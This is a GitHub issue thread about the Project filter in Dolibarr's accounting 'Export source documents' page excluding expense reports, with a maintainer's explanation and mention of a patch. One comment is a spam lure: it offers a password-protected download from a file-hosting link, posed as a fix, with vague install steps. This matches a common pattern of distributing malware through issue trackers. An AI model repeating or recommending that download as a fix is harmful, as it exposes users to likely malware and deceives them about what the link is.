### ISSUE TITLE
Accounting/Export source documents Project filter is NOT working.

### ISSUE THREAD

**Issue by apple9004** [Dolibarr/dolibarr#30772]
### Bug

In the Export source documents at the Accouting menu.
When using the **Project** filter, the output is just **Miscellaneous payment** which is last one in the checked list.
<img width="1079" alt="image" src="https://github.com/user-attachments/assets/af5c0fdb-449c-4c26-ad96-7e3b0431ef56">

I can get other lists when I use **no filter.**
<img width="915" alt="image" src="https://github.com/user-attachments/assets/ecb38a57-64f9-4e0f-a7ca-bfd366c4182a">

### Dolibarr Version

19.0.1

### Environment PHP

8.2.7

### Environment Database

MariaDB 11.0.2

### Steps to reproduce the behavior and expected behavior

The source documents shoud be showed with **Project filter**

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by apple9004** [comment]
> 문제를 해결하려면 이 수정 프로그램을 다운로드해 보세요. 다른 문제에서 이 문제를 발견할 수 있습니다. https://app.mediafire.com/3ag3jpquii3of password: changeme를 설치할 때 설치 경로에 체크하고 "gcc"를 선택해야 합니다.

**Warning!**
I don't want to chage it in the system directory.

**Comment by aspangaro** [comment]
Hello,

Filter project is not considered for expenses report because this module work differently. Project is defined in line of the expenses report.

**Comment by apple9004** [comment]
> Hello,
> 
> Filter project is not considered for expenses report because this module work differently. Project is defined in line of the expenses report.

I really thank you for your reply. 

As you mentioned, "Project is defined in line of the expenses report." means that I have to check the project(or number) when I make an ER(Expense Report). 

What I am confused is that this (left) menu is from "Export source documents" therefore, the main concept of this page the whole documents source are searched by the project (or its number).

without filter, which means no choice of a project  is working correctly but with fiter, a project is selected, is not working as I wish. (I just can see the BQ part)

I thank you again for your intention.

**Comment by aspangaro** [comment]
To summarize, at present, as long as a project is defined, all expense reports are excluded from document export. Why is this? Because the module works differently. With the patch I've proposed, this should correct the problem.
